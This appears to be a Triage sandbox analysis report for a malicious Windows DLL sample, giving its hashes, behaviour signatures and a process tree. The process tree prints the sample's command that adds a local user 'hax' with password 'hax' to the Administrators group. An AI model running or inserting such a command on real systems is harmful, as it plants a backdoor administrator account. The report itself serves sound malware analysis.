Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
12/02/2024, 02:46
Static task
static1
Behavioral task
behavioral1
Sample
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
Resource
win10v2004-20231215-en
General
-
Target
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
-
Size
523KB
-
MD5
4343b9f0e1e7c48438540363710bb73d
-
SHA1
83407f59bc3e32b25405675c4b05b2e7f8156421
-
SHA256
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056
-
SHA512
6a7222b8741682d8d6bab5c28225f26f985944eab0657a0eb07eb4d75d395554d8b859c11030440aaf7829e9ce14f03cbc62d09a350a424bc604ab70b3a08c40
-
SSDEEP
6144:vif0g6k/mf3vpjfUnvCstwmeiUJ5s/yna2i35PFJF/h7yQ6:vK0gjmf3xfU6suxjTs/QbitX/
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1188 wrote to memory of 2524 1188 rundll32.exe 28 PID 1188 wrote to memory of 2524 1188 rundll32.exe 28 PID 1188 wrote to memory of 2524 1188 rundll32.exe 28 PID 2524 wrote to memory of 1564 2524 cmd.exe 30 PID 2524 wrote to memory of 1564 2524 cmd.exe 30 PID 2524 wrote to memory of 1564 2524 cmd.exe 30 PID 1564 wrote to memory of 2512 1564 net.exe 31 PID 1564 wrote to memory of 2512 1564 net.exe 31 PID 1564 wrote to memory of 2512 1564 net.exe 31 PID 2524 wrote to memory of 2724 2524 cmd.exe 32 PID 2524 wrote to memory of 2724 2524 cmd.exe 32 PID 2524 wrote to memory of 2724 2524 cmd.exe 32 PID 2724 wrote to memory of 2132 2724 net.exe 33 PID 2724 wrote to memory of 2132 2724 net.exe 33 PID 2724 wrote to memory of 2132 2724 net.exe 33
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\system32\cmd.exe/K net user /add hax hax && net localgroup administrators hax /add2⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\net.exenet user /add hax hax3⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add hax hax4⤵PID:2512
-
-
-
C:\Windows\system32\net.exenet localgroup administrators hax /add3⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators hax /add4⤵PID:2132
-
-
-